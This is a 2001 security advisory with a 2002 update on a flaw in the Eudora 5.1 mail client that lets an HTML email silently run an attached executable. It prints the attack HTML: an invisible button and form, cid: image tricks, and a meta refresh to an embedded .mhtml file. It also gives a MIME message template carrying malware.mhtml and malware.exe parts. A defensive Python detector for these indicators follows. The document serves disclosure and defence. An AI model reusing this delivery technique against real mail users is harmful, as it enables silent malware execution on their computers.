28th May 2001 [SBWID-2478]
COMMAND
Eudora may be fooled into executing an e-mail attached executable
SYSTEMS AFFECTED
Eudora 5.1
PROBLEM
'http-equiv' found the following: silent delivery and installation
of an executable on a target computer. This can be accomplished
with the default installation of the mail client Eudora 5.1:
- 'allow executables in HTML content' DISABLED
- 'use Microsoft viewer' ENABLED
The manufacturer has done a tremendous job of shutting down all
possibilities of scripting and all other necessaries to achieve
the following result. However, there still remain a number of
good possibilities, one of which is the following that we find
to be quite interesting.
Using the POWAH! of Internet Explorer, we create yet another HTML
mail message as follows:
<FORM action="cid:master.malware.com" method=post target=new><button type=submit style="width:130pt;height:20pt;cursor:hand;background-color:transparent;border:0pt"><u>http://www.malware.com</u></button> </FORM>
<img SRC="cid:master.malware.com" height=1 width=1><img SRC="cid:http://www.malware.com" height=1 width=1>
Where our first image is our executable. Our second image
comprises a simple JavaScripting and ActiveX control. What
happens is, once the mail message is opened in Eudora 5.1, the two
'embedded' images are silently and instantly transferred to the
'Embedded' folder.
What we then do is create a simple html form and button. Owing to
the POWAH! of Internet Explorer, we are able to create this button
with a transparent background. In addition, we are able to
dispose of the border of this button, which combined with the
transparent background gives us nothing. That is, we have a fully
functional form and button but we are not able to see it. We then
create a fake link and incorporate that into our invisible button.
We then embed our simple JavaScripting and ActiveX control into
our invisible button and fire it off to our target computer:
- before click (screen shot: http://www.malware.com/heydora.jpg 62KB)
- after click (screen shot: http://www.malware.com/hey!dora.jpg 62KB)
The recipient is then lulled into clicking on the "link". What
that does is pull our html file comprising our simple
JavaScripting and ActiveX control out of the embedded folder and
into a new Internet Explorer Window.
Because our *.exe and our simple JavaScripting and ActiveX control
reside in the same folder [the so-called 'Embedded' folder], and
because it is automatically opened in our new Internet Explorer
Window, everything is instant.
No warnings. No nothing. The *.exe is executed instantly.
Working Example. Harmless *.exe. incorporated. Tested on win98,
with IE5.5 (all of its patches and so-called service packs),
default Eudora 5.1 with 'use Microsoft viewer' ENABLED and 'allow
executables in HTML content' DISABLED.
The following is in plaintext. We are unable to figure out how
to import a single message into Eudora's inbox. Perhaps some
bright spark knows. Otherwise, incorporate the text sample into
a telnet session or other and fire off to your Eudora inbox:
http://www.malware.com/hey!DORA.txt
Update (25 July 2002)
======
http-equiv updates the status of this advisory with regard to the
latest patch provided for Eudora:
--snipp--
The problem is that the manufacturer left out an important file type to
consider: the *.mhtml file. This is automatically opened by Internet
Explorer via the meta refresh without any warning whatsoever i.e. the
same warning given to *.html.
So what: all we have to do is embed in our mail message [again!] two
files:
i) malware.mhtml which contains our active x control
ii) malware.exe which is our friendly executable
In the mail message we reference our malware.mhtml with the meta
refresh tag and point it to our known location on default install of
Eudora on win98.
So once [again!] someone receives the mail message, both embedded files
are silently and instantly transferred to the Embedded folder. The meta
refresh then springs open the *.mhtml file inside the Embedded folder
without warning, in our conveniently opened new browser window courtesy
of the meta refresh, and bang! it runs the *.exe via the ActiveX
control.
Working Example
===============
Harmless *.exe. incorporated. Tested on win98, with IE6.00 (all of its
patches and so-called service packs), default Eudora 5.1.1 with:
'use Microsoft viewer' ENABLED
'allow executables in HTML content' DISABLED.
The following is in plaintext. We are unable to figure out how to
import a single message into Eudora's inbox. Perhaps some bright spark
knows. Otherwise, incorporate the text sample into a telnet session or
other and fire off to your Eudora inbox (see
http://www.malware.com/boodora.txt):
MIME-Version: 1.0
Content-Type: multipart/related;
boundary="------------49C1C22C537D4A1164278569"
--------------49C1C22C537D4A1164278569
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<META http-equiv=refresh content="1; url=file://C:\WINDOWS\Application Data\Qualcomm\Eudora\Embedded\malware.mhtml">
<!-- 21,07.02 http://www.malware.com -->
<img SRC="cid:mal.ware" style="display:none">
<img SRC="cid:malware" style="display:none">
</html>
--------------49C1C22C537D4A1164278569
Content-Type: application/octet-stream
Content-ID: <mal.ware>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.mhtml"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=
--------------49C1C22C537D4A1164278569
Content-Type: application/octet-stream
Content-ID: <malware>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.exe"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=
--------------49C1C22C537D4A1164278569--
Notes: disable 'use Microsoft viewer'
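As an added defender-side example (not part of the advisory), the following Python inspects a multipart/related message for the two indicators both variants above turn on: an `<img src="cid:...">` that resolves to an embedded part carrying an executable-type filename (used in 2001 and 2002), and a meta refresh pointing at a file:// URL (the 2002 variant). The message below is a constructed stand-in with the same layout as the sample above and dummy bodies in place of the payloads; the extension list is an assumption to tune per environment.

```python
import email, os, re
from email import policy
# Extensions that run or load active content when opened from the Embedded
# folder (assumption: tune for your environment).
RISKY_EXT = {".exe", ".com", ".scr", ".bat", ".pif", ".hta", ".mhtml", ".mht"}
# Constructed stand-in for the advisory's message: same layout, dummy bodies.
SAMPLE = """\
Content-Type: multipart/related; boundary="bnd"

--bnd
Content-Type: text/html; charset=us-ascii

<META http-equiv=refresh content="1; url=file://C:\\WINDOWS\\Application Data\\Qualcomm\\Eudora\\Embedded\\malware.mhtml">
<img SRC="cid:mal.ware" style="display:none">
<img SRC="cid:malware" style="display:none">
--bnd
Content-Type: application/octet-stream
Content-ID: <mal.ware>
Content-Disposition: inline; filename="malware.mhtml"

AAAA
--bnd
Content-Type: application/octet-stream
Content-ID: <malware>
Content-Disposition: inline; filename="malware.exe"

AAAA
--bnd--
"""

def inspect_message(raw):
    # Returns a list of findings; an empty list means neither indicator fired.
    msg = email.message_from_string(raw, policy=policy.default)
    findings, cid_to_name, html = [], {}, ""
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_content_type() == "text/html":
            html += part.get_content()
        cid = (part.get("Content-ID") or "").strip("<> ")
        if cid:  # remember what each cid: reference would resolve to
            cid_to_name[cid] = part.get_filename() or ""
    # Indicator 1: meta refresh whose target is a local file:// URL.
    for m in re.finditer(r'http-equiv\s*=\s*"?refresh"?[^>]*?url=([^">]+)', html, re.I):
        if m.group(1).strip().lower().startswith("file:"):
            findings.append("meta refresh to local file: " + m.group(1).strip())
    # Indicator 2: cid: image whose part is really an executable-type attachment.
    for m in re.finditer(r'src\s*=\s*"?cid:([^"\s>]+)', html, re.I):
        name = cid_to_name.get(m.group(1), "")
        if os.path.splitext(name)[1].lower() in RISKY_EXT:
            findings.append("cid:%s resolves to embedded file %s" % (m.group(1), name))
    return findings
```

Run `inspect_message()` over a raw message at the gateway or in a mailbox scan; any non-empty result is worth quarantining for review.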
SOLUTION
?